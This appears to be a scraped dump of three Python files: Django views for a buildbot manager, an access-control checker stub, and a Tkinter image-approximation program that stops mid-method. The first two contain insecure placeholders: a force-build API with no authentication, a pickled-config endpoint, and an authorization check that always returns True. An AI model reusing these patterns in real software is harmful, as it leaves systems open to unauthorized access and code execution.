    project.buildmaster.stop()
    detail_url = reverse("cthulhubot-project-detail",
                         kwargs={"project": project.slug})
    return HttpResponseRedirect(detail_url)
def add_computer(post, **kwargs):
    """Dispatch target: register a new build computer from the given fields."""
    return BuildComputer.objects.add(**kwargs)
def check_builder(post, user, assignment, **kwargs):
    """Dispatch target: bounce straight back to the assignment detail page."""
    detail_url = reverse("cthulhubot-job-assignment-detail",
                         kwargs={"assignment_id": assignment.pk})
    return HttpResponseRedirect(detail_url)
def start_slave(post, project, **kwargs):
    """Dispatch target: start the buildslave client chosen in the POST data."""
    client_pk = int(post.get('client_id'))
    ProjectClient.objects.get(pk=client_pk).start()
    return HttpResponseRedirect(
        reverse("cthulhubot-project-detail", kwargs={"project": project.slug}))
def create_slave_dir(post, project, **kwargs):
    """Dispatch target: create the build directory for the chosen client."""
    client_pk = int(post.get('client_id'))
    ProjectClient.objects.get(pk=client_pk).create_build_directory()
    return HttpResponseRedirect(
        reverse("cthulhubot-project-detail", kwargs={"project": project.slug}))
def create_job_assignment(job, computer, project, params=None):
    """Persist a job assignment and lazily provision a project client.

    Order matters: the domain object writes its configuration first, then
    the underlying model records the job version and is saved.  The first
    time a computer is assigned to a project, a ProjectClient credential
    pair is created with a generated password so the slave can authenticate.
    """
    assignment = JobAssignment(
        job = job.model,
        project = project,
        computer = computer,
    ).get_domain_object()
    assignment.create_config(params)
    assignment.model.version = assignment.job_version
    assignment.model.save()
    # provision the computer<->project client only once
    if len(ProjectClient.objects.filter(project=project, computer=computer)) == 0:
        client = ProjectClient(project=project, computer=computer)
        client.generate_password()
        client.save()
    return assignment
def force_build(post, project, user, **kwargs):
    """Dispatch target: force a build of the posted assignment, notify, redirect."""
    assignment_pk = int(post.get('assignment_id'))
    JobAssignment.objects.get(pk=assignment_pk).get_domain_object().force_build()
    user.message_set.create(message="Build forced")
    return HttpResponseRedirect(
        reverse("cthulhubot-project-detail", kwargs={"project": project.slug}))
########### VIEWS
@login_required
@transaction.commit_on_success
def dashboard(request):
    """Render the static dashboard landing page."""
    return direct_to_template(request, 'cthulhubot/dashboard.html')
@login_required
def projects(request):
    """List every project, alphabetically by name."""
    project_list = Project.objects.all().order_by('name')
    context = {'projects': project_list}
    return direct_to_template(request, 'cthulhubot/projects.html', context)
@login_required
@transaction.commit_on_success
def projects_create(request):
    """Project creation form; creates the project and redirects on valid POST."""
    if request.method == "POST":
        form = CreateProjectForm(request.POST)
        if form.is_valid():
            new_project = create_project(
                name=form.cleaned_data['name'],
                tracker_uri=form.cleaned_data['issue_tracker'],
                repository_uri=form.cleaned_data['repository'],
            )
            detail_url = reverse("cthulhubot-project-detail",
                                 kwargs={"project": new_project.slug})
            return HttpResponseRedirect(detail_url)
    else:
        form = CreateProjectForm()
    return direct_to_template(request, 'cthulhubot/projects_create.html',
                              {'form': form})
@login_required
@transaction.commit_on_success
def project_detail(request, project):
    """Project page: dispatches master/slave control POSTs, lists assignments.

    Fix: the dispatch table listed the "stop_master" key twice; the second
    identical entry was dead (dict literals keep only the last value) and
    has been removed.
    """
    project = get_object_or_404(Project, slug=project)
    redirect = dispatch_post(request, {
        "create_master" : create_master,
        "start_master" : start_master,
        "stop_master" : stop_master,
        "start_slave" : start_slave,
        "create_slave_dir" : create_slave_dir,
        "force_build" : force_build,
        },
        kwargs = {
            "project" : project,
            "user" : request.user,
        }
    )
    if redirect:
        return redirect
    # resolve domain objects once; clients are de-duplicated via set()
    assignments = [assignment.get_domain_object() for assignment in JobAssignment.objects.filter(project=project)]
    clients = list(set([assignment.get_client() for assignment in assignments]))
    return direct_to_template(request, 'cthulhubot/project_detail.html', {
        'project' : project,
        'job_assignments' : assignments,
        'clients' : clients,
    })
@login_required
def project_changeset_view(request, project):
    """Show repository changesets, newest first, annotated with build results."""
    project = get_object_or_404(Project, slug=project)
    db = get_database_connection()
    history = db.repository.find().sort([("commiter_date", DESCENDING),])
    changesets = []
    for cs in history:
        # attach the result of every build recorded for this changeset hash
        builds = db.builds.find({"changeset": cs['hash']})
        cs['results'] = [build['result'] for build in builds]
        changesets.append(cs)
    return direct_to_template(request, 'cthulhubot/project_changeset_view.html', {
        'project': project,
        'changesets': changesets,
    })
@login_required
@transaction.commit_on_success
def computers(request):
    """List every build computer, ordered by name."""
    machine_list = BuildComputer.objects.all().order_by('name')
    return direct_to_template(request, 'cthulhubot/computers.html',
                              {'computers': machine_list})
@login_required
@transaction.commit_on_success
def computers_create(request):
    """Build-computer creation form; saves and redirects on valid POST."""
    if request.method == "POST":
        form = ComputerForm(request.POST)
        if form.is_valid():
            machine = form.save()
            return HttpResponseRedirect(reverse(
                "cthulhubot-computer-detail", kwargs={"computer": machine.slug}))
    else:
        form = ComputerForm()
    return direct_to_template(request, 'cthulhubot/computers_create.html',
                              {'form': form})
@login_required
@transaction.commit_on_success
def computer_detail(request, computer):
    """Detail page for one build computer, looked up by slug (404 if absent)."""
    machine = get_object_or_404(BuildComputer, slug=computer)
    return direct_to_template(request, 'cthulhubot/computer_detail.html',
                              {'computer': machine})
@login_required
@transaction.commit_on_success
def computer_edit(request, computer):
    """Edit an existing build computer; redirects to its detail page on success."""
    machine = get_object_or_404(BuildComputer, slug=computer)
    if request.method == "POST":
        form = ComputerForm(request.POST, instance=machine)
        if form.is_valid():
            machine = form.save()
            return HttpResponseRedirect(reverse(
                "cthulhubot-computer-detail", kwargs={"computer": machine.slug}))
    else:
        form = ComputerForm(instance=machine)
    return direct_to_template(request, 'cthulhubot/computers_edit.html',
                              {'form': form})
@login_required
@transaction.commit_on_success
def commands(request):
    """List the registered commands, ordered by slug."""
    command_list = Command.objects.all().order_by('slug')
    return direct_to_template(request, 'cthulhubot/commands.html',
                              {'commands': command_list})
@login_required
@transaction.commit_on_success
def commands_discover(request):
    """Show undiscovered commands; a POST with a single key registers it.

    The POSTed form is expected to carry exactly one key: the slug of the
    command to register (Python 2 idiom -- ``keys()`` returns an indexable
    list).  Unknown slugs are silently ignored.
    """
    if request.method == "POST":
        if len(request.POST.keys()) == 1:
            command_slug = request.POST.keys()[0]
            command = get_undiscovered_commands().get(command_slug)
            if command:
                Command.objects.get_or_create(slug=command.identifier)
            return HttpResponseRedirect(reverse('cthulhubot-commands-discover'))
    return direct_to_template(request, 'cthulhubot/commands_discover.html', {
        'commands' : get_undiscovered_commands(),
    })
@login_required
@transaction.commit_on_success
def jobs(request):
    """List every known job, ordered by slug."""
    job_list = Job.objects.all().order_by('slug')
    return direct_to_template(request, 'cthulhubot/jobs.html',
                              {'jobs': job_list})
@login_required
@transaction.commit_on_success
def jobs_configure(request):
    """Job auto-discovery page.

    On a POST carrying the 'auto-discovery' key, a Job row is created for
    every undiscovered job slug and the user is redirected to the job list.
    ``available_commands`` is always empty here -- presumably a placeholder
    for manual configuration (TODO confirm against the template).
    """
    discovered = get_undiscovered_jobs()
    available_commands = []
    if request.method == "POST" and u'auto-discovery' in request.POST:
        # get_undiscovered_jobs() supports .get() elsewhere in this module,
        # so iterating it yields the job slugs (mapping keys)
        for job in get_undiscovered_jobs():
            Job.objects.get_or_create(slug=job)
        return HttpResponseRedirect(reverse('cthulhubot-jobs'))
    return direct_to_template(request, 'cthulhubot/jobs_configure.html', {
        'discovered_jobs' : discovered,
        'available_commands' : available_commands,
    })
@login_required
@transaction.commit_on_success
def job_add(request, job):
    """Configuration form for one undiscovered job; 404 for unknown slugs."""
    job_class = get_undiscovered_jobs().get(job)
    if job_class is None:
        raise Http404()
    job_instance = job_class()
    config_form = get_job_configuration_form(job_instance)
    return direct_to_template(request, 'cthulhubot/job_add.html', {
        'job': job_instance,
        'form': config_form,
    })
@login_required
@transaction.commit_on_success
def job_assigment(request, project):
    """Job-selection page for assigning a job to *project* (sic 'assigment')."""
    target_project = get_object_or_404(Project, slug=project)
    job_list = Job.objects.all().order_by('slug')
    return direct_to_template(request, 'cthulhubot/job_assigment.html', {
        'project': target_project,
        'jobs': job_list,
    })
@login_required
@transaction.commit_on_success
def job_assigment_config(request, project, job):
    """Configure one job for a project: computer, job params and scheduler.

    Three independent forms must all validate on POST; on success a
    JobAssignment is created and the user returns to the project page.
    """
    project = get_object_or_404(Project, slug=project)
    job = get_object_or_404(Job, slug=job)
    job = job.get_domain_object()
    computers = BuildComputer.objects.all().order_by('name')
    # unbound forms for the initial GET render (the selection form factory
    # returns a class, hence the double call)
    computer_form = get_build_computer_selection_form(computers)()
    job_form = get_job_configuration_form(job)
    scheduler_form = get_scheduler_form()
    if request.method == "POST":
        # re-create all three forms bound to the POST data
        computer_form = get_build_computer_selection_form(computers)(request.POST)
        job_form = get_job_configuration_form(job, post=request.POST)
        scheduler_form = get_scheduler_form(post=request.POST)
        if computer_form.is_valid() and job_form.is_valid() and scheduler_form.is_valid():
            computer = get_object_or_404(BuildComputer, pk=computer_form.cleaned_data['computer'])
            # job parameters plus the scheduler configuration form one dict
            params = get_command_params_from_form_data(job, job_form.cleaned_data)
            params.update(scheduler_form.get_configuration_dict())
            create_job_assignment(computer=computer, job=job, project=project, params=params)
            return HttpResponseRedirect(reverse('cthulhubot-project-detail', kwargs={'project' : project.slug}))
    return direct_to_template(request, 'cthulhubot/job_assigment_config.html', {
        'project' : project,
        'job' : job,
        'job_form' : job_form,
        'computers' : computers,
        'computer_form' : computer_form,
        'scheduler_form' : scheduler_form,
    })
@login_required
@transaction.commit_on_success
def job_assigment_detail(request, assignment_id):
    """Detail page for one job assignment; handles the 'builder-check' POST."""
    assignment = get_object_or_404(JobAssignment, pk=assignment_id).get_domain_object()
    redirect = dispatch_post(request, {
        "builder-check" : check_builder,
        },
        kwargs = {
            "user" : request.user,
            "assignment" : assignment,
        }
    )
    if redirect:
        return redirect
    return direct_to_template(request, 'cthulhubot/job_assignment_detail.html', {
        'assignment' : assignment,
        'project' : assignment.project,
        'computer' : assignment.computer,
        'job' : assignment.job,
        'builds' : assignment.builds,
    })
@protect_digest_model(realm=Buildmaster.REALM,
    model=Buildmaster,
    realm_field = None,
    username_field='buildmaster_port',
    password_field='password'
)
def api_buildmaster_config(request, identifier):
    """Digest-auth-protected endpoint returning a pickled master config.

    Authentication uses the master's port as username and its stored
    password.  NOTE(review): the config ships as a pickle; the consumer must
    be trusted, since unpickling attacker-controlled data executes code.
    """
    master = get_object_or_404(Buildmaster, pk=identifier)
    return HttpResponse(pickle_dumps(master.get_config()))
#TODO: Authentication?
def api_force_build(request, assignment_id):
    """API endpoint that forces a build of the given assignment.

    Expects a POST whose "data" field is a URL-quoted JSON payload; replies
    with an empty JSON object.  NOTE(review): no authentication is performed
    -- see the TODO above.
    """
    if request.method != "POST":
        return HttpResponseBadRequest(["POST"])
    assignment = get_object_or_404(JobAssignment, pk=assignment_id).get_domain_object()
    master = assignment.project.get_buildmaster()
    from urllib import unquote_plus  # Python 2 location of unquote_plus
    data = deserialize(unquote_plus(request.POST.get("data")))
    forcer = BuildForcer(assignment=assignment, master=master, buildbot_data=data)
    forcer.run()
    #TODO: maybe return some status, like build number
    return HttpResponse('{}')
@login_required
def step_part_detail(request, step, detail_name):
    """Return one named field of a build-step document, or 404 when absent."""
    db = get_database_connection()
    document = db.steps.find_one({"_id": ObjectId(str(step))})
    if not document or detail_name not in document:
        return HttpResponseNotFound()
    return HttpResponse(document[detail_name])
|
UTF-8
|
Python
| false | false | 2,011 |
13,314,398,657,934 |
8a090a8c2d65fc6ab922c75bb3f96bbac9f81051
|
231b99d853d5bdf8855ce83e8c359414572a63c5
|
/Sirpple/uac/uac_checker.py
|
5d3bea4ba0da9d0ba9a069b59906c4ea4a40f1c6
|
[] |
no_license
|
Samnsparky/Sirpple
|
https://github.com/Samnsparky/Sirpple
|
9d38a4fda08cef6e8f87a1a6d69f2cc852238050
|
526666edf29c836de64e15a6dab64d47a4c2a424
|
refs/heads/master
| 2016-09-06T01:42:46.043512 | 2011-12-12T09:26:24 | 2011-12-12T09:26:24 | 2,722,024 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
Module containing logic to check that a user is authorized to view / edit an entity
"""
# TODO: Factory currently sitting serialization.backends
class UACChecker:
    """
    High level strategy interface to check to see if a user can view / edit a model instance
    """

    def __init__(self):
        pass

    def is_authorized(self, target, user):
        """
        Determines if the given user has read / write access to target

        @param target: The model that the user wants to access
        @type target: Any instance of the subclass of AdaptedModel currently in use
        @param user: The user that wishes to access the model instance in question
        @type user: The backend-specific user representation
        """
        # Fix: corrected the typo "implmentor" in the raised error message.
        raise NotImplementedError("Must use implementor of this interface")
class GAEUACChecker(UACChecker):
    """
    Google App Engine specific implemention of UACChecker
    """

    # shared singleton instance, created lazily by get_instance()
    __instance = None

    @classmethod
    def get_instance(cls):
        """
        Get a shared instance of this GAEUACChecker singleton

        Fixes: the classmethod's first parameter was misleadingly named
        ``self`` (renamed to the conventional ``cls``), and the None check
        now uses ``is None`` instead of ``== None``.

        @return: Shared GAEUACChecker instance
        @rtype: GAEUACChecker
        """
        if GAEUACChecker.__instance is None:
            GAEUACChecker.__instance = GAEUACChecker()
        return GAEUACChecker.__instance

    def is_authorized(self, target, user):
        # Placeholder: everyone is authorized until authentication lands.
        # NOTE: target or user may be None.
        return True  # TODO: After authentication, this ought to be filled in
# NOTE: user or target might be null
|
UTF-8
|
Python
| false | false | 2,011 |
11,029,476,045,025 |
fe315fa8f975c08842adcb4ae142f0cc0d05f86b
|
6128881e158fe57c13228da1ddd2550c84a69c1b
|
/image_misc/poly_image.py
|
7ec04e86cf4f3ce814a9288c4c365f2aca9fb599
|
[] |
no_license
|
aroberge/py-fun
|
https://github.com/aroberge/py-fun
|
5c6b61308f29b3ddc12c43328d67fc6ff3636731
|
dd721e096f8445aee48e69c3a3ebf6501aecc95b
|
refs/heads/master
| 2021-01-19T06:45:34.216897 | 2011-07-09T14:26:19 | 2011-07-09T14:26:19 | 32,361,947 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''
Application to approximate an image by a set of polygons.
Inspired by:
http://rogeralsing.com/2008/12/07/genetic-programming-evolution-of-mona-lisa/
'''
from random import randint
import time
import copy
import Tkinter as tk
import tkFileDialog, tkMessageBox
import Image, ImageTk, ImageChops, ImageStat # from PIL
import aggdraw
from src.state_engine import StateEngine
from src.color_chooser import SimpleColorChooser
import src.dialogs as dialogs
# Normalisation offset used by the module-level fitness() below; 0 means
# "not computed yet" -- it is filled in lazily on the first call.
FITNESS_OFFSET = 0
# todo: investigate the use of ImageStat.Stat(image, mask)
# todo: investigate the use of stat.mean instead of stat.rms
class Fitness(object):
    """Stateful image-similarity scorer (0 = all-background, 100 = identical).

    Keeps the normalisation offset as instance state instead of the
    module-level FITNESS_OFFSET global that the standalone fitness()
    function below uses.
    """

    def __init__(self):
        # 0 means "offset not computed yet"; set on the first evaluate() call
        self.fitness_offset = 0

    def evaluate(self, im1, im2, background="black"):
        """Calculate a value derived from the root mean squared of the difference
        between two images. It is normalized so that when a black image is
        compared with the original one (img1), the fitness given is 0, and when the
        image is identical, the fitness value is 100."""
        try:
            stat = ImageStat.Stat(ImageChops.difference(im1, im2))
        except Exception:
            # Fix: narrowed from a bare `except:` (which also swallowed
            # KeyboardInterrupt/SystemExit).  A mode mismatch -- typically a
            # missing alpha channel on the original image -- lands here;
            # add the alpha channel and retry once.
            print("missing alpha channel in original image?")
            im1.putalpha(255)
            stat = ImageStat.Stat(ImageChops.difference(im1, im2))
        fit = 1. - sum(stat.rms[:3])/(255*3)
        if self.fitness_offset == 0:
            # One-time normalisation: the score of an all-background canvas
            # against im1 anchors the 0 end of the scale.
            black_image = aggdraw.Draw("RGBA", im1.size, background)
            s = black_image.tostring()
            raw = Image.fromstring('RGBA', im1.size, s)
            stat = ImageStat.Stat(ImageChops.difference(im1, raw))
            self.fitness_offset = 1. - sum(stat.rms[:3])/(255*3)
        return 100*(fit-self.fitness_offset)/(1.-self.fitness_offset)
def fitness(im1, im2, background="black"):
    """Calculate a value derived from the root mean squared of the difference
    between two images. It is normalized so that when a black image is
    compared with the original one (img1), the fitness given is 0, and when the
    image is identical, the fitness value is 100."""
    # Module-level twin of Fitness.evaluate(); the normalization baseline is
    # cached in the FITNESS_OFFSET global, so it is only valid for a single
    # original image per process.
    global FITNESS_OFFSET
    try:
        stat = ImageStat.Stat(ImageChops.difference(im1, im2))
    except:  # NOTE(review): bare except; presumably a missing alpha channel
        print "missing alpha channel in original image?"
        im1.putalpha(255)
        stat = ImageStat.Stat(ImageChops.difference(im1, im2))
    # rms[:3] -> per-band RGB error only; the alpha band is ignored.
    fit = 1. - sum(stat.rms[:3])/(255*3)
    if FITNESS_OFFSET == 0:
        # Baseline: fitness of a plain `background` image vs. the original.
        black_image = aggdraw.Draw("RGBA", im1.size, background)
        s = black_image.tostring()
        raw = Image.fromstring('RGBA', im1.size, s)
        stat = ImageStat.Stat(ImageChops.difference(im1, raw))
        FITNESS_OFFSET = 1. - sum(stat.rms[:3])/(255*3)
    # Rescale so background-only -> 0 and identical image -> 100.
    return 100*(fit-FITNESS_OFFSET)/(1.-FITNESS_OFFSET)
class DNA(object):
    """Genome for the image approximation.

    Holds `polygons` genes, each stored as
    ``[flat [x0, y0, x1, y1, ...] vertex list, [r, g, b, alpha]]``
    with coordinates bounded by the canvas size."""
    def __init__(self, width, height, polygons=50, edges=6, background=(0, 0, 0)):
        self.polygons = polygons
        self.background = background
        self.edges = edges
        self.width = width
        self.height = height
        self.genes = []
        self.init_dna()

    def init_dna(self):
        """Replace the genome with a fresh random one.

        BUGFIX: the original appended without clearing, so every call after
        the first (e.g. from App.reset) silently grew the genome."""
        self.genes = []
        for _ in range(self.polygons):
            self.genes.append(self.create_random_polygon())

    def create_random_polygon(self):
        """Return one random gene: `edges` vertices inside the canvas plus a
        random RGBA colour (randint bounds are inclusive)."""
        coords = []
        for _ in range(self.edges):
            coords.append(randint(0, self.width))
            coords.append(randint(0, self.height))
        colour = [randint(0, 255) for _ in range(4)]
        return [coords, colour]

    def mutate(self):
        """Large mutation: replace one colour channel or one vertex
        coordinate of a random polygon with a brand new random value."""
        gene = self.genes[randint(0, self.polygons - 1)]
        kind = randint(0, 2)
        if kind == 0:    # colour channel (r, g, b or alpha)
            gene[1][randint(0, 3)] = randint(0, 255)
        elif kind == 1:  # x coordinate
            gene[0][2 * randint(0, self.edges - 1)] = randint(0, self.width)
        else:            # y coordinate
            gene[0][2 * randint(0, self.edges - 1) + 1] = randint(0, self.height)

    def _nonzero_delta(self, max_change):
        """Random non-zero step in [5 - max_change, 5].

        NOTE(review): the range is asymmetric around zero, exactly as in the
        original code -- confirm whether a symmetric step was intended."""
        delta = 0
        while delta == 0:
            delta = 5 - randint(0, max_change)
        return delta

    def _clamped(self, current, delta, upper):
        """Return current + delta clamped to [0, upper]; if the clamp would
        land back on `current`, step one unit inside the bound so a small
        mutation is always an actual change."""
        value = current + delta
        if value < 0:
            return 0 if current != 0 else 1
        if value > upper:
            return upper if current != upper else upper - 1
        return value

    def small_mutate(self, max_change):
        """Small mutation: nudge one colour channel or one vertex coordinate
        of a random polygon by a bounded non-zero amount (the three former
        copy-pasted clamping branches now share _clamped)."""
        gene = self.genes[randint(0, self.polygons - 1)]
        kind = randint(0, 2)
        delta = self._nonzero_delta(max_change)
        if kind == 0:    # colour channel
            i = randint(0, 3)
            gene[1][i] = self._clamped(gene[1][i], delta, 255)
        elif kind == 1:  # x coordinate
            i = 2 * randint(0, self.edges - 1)
            gene[0][i] = self._clamped(gene[0][i], delta, self.width)
        else:            # y coordinate
            i = 2 * randint(0, self.edges - 1) + 1
            gene[0][i] = self._clamped(gene[0][i], delta, self.height)
class AggDrawCanvas(tk.Canvas):
    """Tk canvas that renders a DNA genome with aggdraw and tracks the
    rendered image's fitness against a target image."""
    def __init__(self, parent, original):
        # NOTE(review): `original` is accepted but unused here -- the target
        # image is actually installed later via new_original(); confirm the
        # parameter can be dropped.
        tk.Canvas.__init__(self, parent)
        self.parent = parent
        self.image_id = None
        self.img = None
        self.display_every = 1  # refresh the on-screen image every N mutations
        self.background = "#000000"
        # the following are used to calculate the average nb of mutation/second
        self.keep_last_n = 20
        self.gen_times = [1. for i in range(self.keep_last_n)]
        self.last_time = time.time()
    def new_original(self, original):
        """Reset the canvas for a new target image: fresh DNA, counters
        and drawing buffers sized to the image."""
        self.original = original
        self.mutations = 0
        _img = ImageTk.PhotoImage(self.original)
        self.set_size(_img.width(), _img.height())
        self.img = Image.new("RGBA", self.size_, self.background)
        self.dna = DNA(self.width_, self.height_, background=self.background)
        self.context = aggdraw.Draw(self.img)
    def set_size(self, width, height):
        # Keep the width_/height_/size_ mirrors in sync with the widget size.
        self.width_ = width
        self.height_ = height
        self.size_ = width, height
        self.config(width=width, height=height)
    def draw_dna(self):
        """Paint the background, then every polygon gene, then refresh."""
        brush = aggdraw.Brush(self.background, opacity=255)
        self.context.rectangle((0, 0, self.width_, self.height_), brush)
        for gene in self.dna.genes:
            # gene = [flat coord list, [r, g, b, alpha]]
            brush = aggdraw.Brush(tuple(gene[1][0:3]), opacity=gene[1][3])
            self.context.polygon(gene[0], brush)
        self.redraw()
    def redraw(self):
        """Recompute fitness and -- every `display_every` mutations -- blit
        the rendered image to the Tk canvas."""
        self.mutations += 1
        self.calc_average_time()
        s = self.context.tostring()
        raw = Image.fromstring('RGBA', self.size_, s)
        # Uses the module-level fitness() (and its FITNESS_OFFSET global).
        self.fitness = fitness(self.original, raw, self.background)
        if self.mutations % self.display_every:
            return  # skip the (slow) screen update on most iterations
        self.parent.update_info()
        self.image = ImageTk.PhotoImage(raw)
        self.delete(self.image_id)
        self.image_id = self.create_image(self.width_/2, self.height_/2, image=self.image)
        self.update()
    def calc_average_time(self):
        '''calculates the average time for a given mutation - based on the
        previous "fastest n-1" and converts it to a number of mutation
        per second.'''
        now = time.time()
        # Ring buffer of the last keep_last_n iteration durations.
        self.gen_times[self.mutations%self.keep_last_n] = now - self.last_time
        self.last_time = now
        # discard the longest time iteration to avoid skewing results
        self.ave_gen_per_second = self.keep_last_n/sum(sorted(self.gen_times)[:-1])
def prevent_accidental_closure():
    """Swallow the close event on a child window and tell the user to quit
    from the main window instead (wired to WM_DELETE_WINDOW)."""
    message = ("Use the main window (where images are loaded) "
               "to end this program.")
    tkMessageBox.showinfo("Quit?", message)
class FitWindow(tk.Toplevel):
    """Secondary Tk window hosting an AggDrawCanvas, its fitness/rate label
    and a display-frequency button.  Subclasses add extra controls via
    setup_controls()."""
    def __init__(self, parent, original_image, title):
        tk.Toplevel.__init__(self)
        self.title(title)
        self.parent = parent
        main_frame = tk.Frame(self)
        # image frame
        self.image_frame = tk.Frame(main_frame)
        # AggDrawCanvas calls parent.update_info(); route it to this window.
        self.image_frame.update_info = self.update_info
        self.fit = AggDrawCanvas(self.image_frame, original_image)
        self.fit.pack()
        # Closing this window would break the app; intercept the close button.
        self.protocol("WM_DELETE_WINDOW", prevent_accidental_closure)
        info_frame = tk.Frame(self.image_frame)
        info_frame.pack()
        self.info = tk.Label(info_frame, text="Current fitness")
        self.info.pack()
        self.show_every_btn = tk.Button(info_frame, width=25, height=1,
                  text="Display every %d image." % self.fit.display_every,
                  command=self.set_show_every)
        self.show_every_btn.pack()
        self.image_frame.pack(side=tk.RIGHT)
        self.setup_controls(main_frame)
        main_frame.pack()
    def setup_controls(self, main_frame):
        # Hook for subclasses to add their own widgets to the window.
        pass # implemented by subclass
    def update_info(self):
        """Refresh the fitness/mutation label; integer mutations-per-second
        formatting above 2/s, fractional below."""
        if self.fit.ave_gen_per_second > 2:
            self.info.config(text = "Fitness: %2.2f\nMutations: %d\n[per second: %d]" %
                      (self.fit.fitness, self.fit.mutations,
                      int(self.fit.ave_gen_per_second)))
        else:
            self.info.config(text = "Fitness: %2.2f\nMutations: %d\n[per second: %1.2f]" %
                      (self.fit.fitness, self.fit.mutations,
                      self.fit.ave_gen_per_second))
    def set_show_every(self):
        """Ask the user how often the rendered image should be refreshed."""
        set_frequency_dialog = dialogs.ImageFrequency(self)
        if set_frequency_dialog.result is not None:
            self.fit.display_every = set_frequency_dialog.result
            self.show_every_btn.config(text =
                      "Display every %d image.\n" % self.fit.display_every)
class BestFitWindow(FitWindow):
    """FitWindow for the best genome found so far; adds the main control
    buttons (background colour, save/load polygons, sizing, image export)."""
    def setup_controls(self, main_frame):
        #self.control_frame = tk.Frame(main_frame)
        set_color_btn = tk.Button(main_frame, width=25,
                  text="Select background color",
                  command=self.parent.set_background_color)
        set_color_btn.pack()
        # Small read-out: current background colour name + a colour swatch.
        small_frame = tk.Frame(main_frame)
        self.color_value = tk.Label(small_frame)
        self.color_value.configure(text=self.fit.background, width=10)
        self.color_value.pack(side=tk.LEFT)
        self.color_sample = tk.Label(small_frame)
        self.color_sample.configure(width=14)
        self.color_sample.pack(side=tk.LEFT)
        small_frame.pack()
        self.color_sample.configure(background=self.fit.background)
        save_polygons_btn = tk.Button(main_frame, width=25,
                  text="Save polygons",
                  command=self.save_poly)
        save_polygons_btn.pack()
        load_polygons_btn = tk.Button(main_frame, width=25,
                  text="Load polygons",
                  command=self.load_poly)
        load_polygons_btn.pack()
        self.set_nb_polygons_btn = tk.Button(main_frame, width=25, height=1,
                  text="Use N polygons.", command=self.set_nb_polygons)
        self.set_nb_polygons_btn.pack()
        self.set_nb_sides_btn = tk.Button(main_frame, width=25, height=1,
                  text="Number of sides per polygon.", command=self.set_nb_sides)
        self.set_nb_sides_btn.pack()
        self.save_image_btn = tk.Button(main_frame, width=25, height=1,
                  text="Save image.", command=self.save_image)
        self.save_image_btn.pack()
        #self.control_frame.pack(side=tk.LEFT)
    def save_image(self):
        # Delegates entirely to the dialog module.
        dialogs.SaveImage()
    def set_nb_polygons(self):
        # NOTE(review): the dialog result is never applied (see the
        # commented-out block below) -- this looks unfinished.
        polygons_dialog = dialogs.NumberOfPolygons(self)
        #if set_frequency_dialog.result is not None:
        #    self.fit.display_every = set_frequency_dialog.result
        #    self.show_every_btn.config(text =
        #        "Display every %d image.\n" % self.fit.display_every)
    def set_nb_sides(self):
        # NOTE(review): same as set_nb_polygons -- the dialog result is unused.
        sides_dialog = dialogs.NumberOfSides(self)
        #if sides_dialog.result is not None:
        #    self.fit.display_every = set_frequency_dialog.result
        #    self.show_every_btn.config(text =
        #        "Display every %d image.\n" % self.fit.display_every)
    def save_poly(self):
        """Serialize background, counts and every gene to a whitespace
        separated text file chosen by the user."""
        filename = tkFileDialog.asksaveasfilename()
        if not filename:
            return
        filehandle = open(filename, "w")
        # NOTE(review): filehandle is never closed/flushed explicitly.
        print "save_poly called"
        dna = []
        dna.append(self.fit.background)
        dna.append(str(self.fit.dna.polygons))
        dna.append(str(self.fit.dna.edges))
        coords = range(2*self.fit.dna.edges)  # NOTE(review): unused variable
        for gene in self.fit.dna.genes:
            for item in gene:
                for value in item:
                    dna.append(str(value))
        filehandle.write(' '.join(dna))
    def load_poly(self):
        """Inverse of save_poly: rebuild the genome from a file, then push
        the loaded state into the companion current_fit canvas too."""
        filename = tkFileDialog.askopenfilename()
        if not filename:
            return
        items = open(filename).read().split()
        # Header: background colour, polygon count, edges per polygon.
        self.fit.background = items[0]
        self.fit.dna.polygons = int(items[1])
        self.fit.dna.edges = int(items[2])
        nb_coords = 2*self.fit.dna.edges
        nb_subitems = nb_coords + 4 # 4 color values per polygon
        offset = 3 # first 3 values are excluded
        self.fit.dna.genes = []
        for i in range(self.fit.dna.polygons):
            coords = []
            color = []
            for j in range(nb_coords):
                coords.append(int(items[offset+i*nb_subitems + j]))
            for j in range(4):
                color.append(int(items[offset+i*nb_subitems + nb_coords + j]))
            self.fit.dna.genes.append([coords, color])
        # Keep the "current attempt" canvas in lock-step with what we loaded.
        self.fit.current_fit.background = self.fit.background
        self.fit.current_fit.dna.polygons = self.fit.dna.polygons
        self.fit.current_fit.dna.edges = self.fit.dna.edges
        self.fit.current_fit.dna = copy.deepcopy(self.fit.dna)
class App(object):
    """The main application window: shows the target image and owns the two
    satellite windows ("Best fit" and "Current attempt") plus the
    hill-climbing loop driven through run()/step()/pause()."""
    def __init__(self, parent):
        # Expose the controls on the root window (used by the state engine).
        parent.controls = self
        # Main window
        filename_button = tk.Button(parent, text="New image",
                  command=self.load_image)
        filename_button.pack(side=tk.TOP)
        self.original_image = tk.Canvas(parent)
        self.original_image.pack(side=tk.TOP)
        self.original = None
        # Two satellite windows: best genome so far, and the one being mutated.
        self.best_fit_window = BestFitWindow(self, self.original, "Best fit")
        self.best_fit = self.best_fit_window.fit
        cur_fit_window = FitWindow(self, self.original, "Current attempt")
        self.current_fit = cur_fit_window.fit
        self.best_fit.current_fit = self.current_fit
    def load_image(self):
        """Pick an image file, display it, and restart both canvases on it."""
        filename = tkFileDialog.askopenfilename()
        if not filename:
            return
        try:
            self.original = Image.open(filename)
        except IOError:
            print "ignored IOError; most likely not a valid image file."
            return
        img = ImageTk.PhotoImage(self.original)
        width, height = img.width(), img.height()
        self.original_image.config(width=width, height=height)
        self.original_image.create_image(width/2, height/2, image=img)
        self.__img = img # need to keep a reference otherwise it disappears!
        self.best_fit.new_original(self.original)
        self.best_fit.draw_dna()
        self.current_fit.new_original(self.original)
        # Both canvases start from the same genome.
        self.current_fit.dna = copy.deepcopy(self.best_fit.dna)
        self.current_fit.draw_dna()
    def set_background_color(self):
        """Let the user choose a background colour; applied to both canvases."""
        scc = SimpleColorChooser(self.best_fit_window)
        color = scc.choose_color()
        self.best_fit.background = color
        self.current_fit.background = color
        self.best_fit_window.color_value.configure(text=color)
        self.best_fit_window.color_sample.configure(background=color)
    def reset(self):
        '''restarts the image fitting with a new set of polygons'''
        self.running = False
        # NOTE(review): assumes DNA.init_dna() yields a *fresh* genome --
        # verify it clears the gene list rather than appending to it.
        if tkMessageBox.askokcancel("",
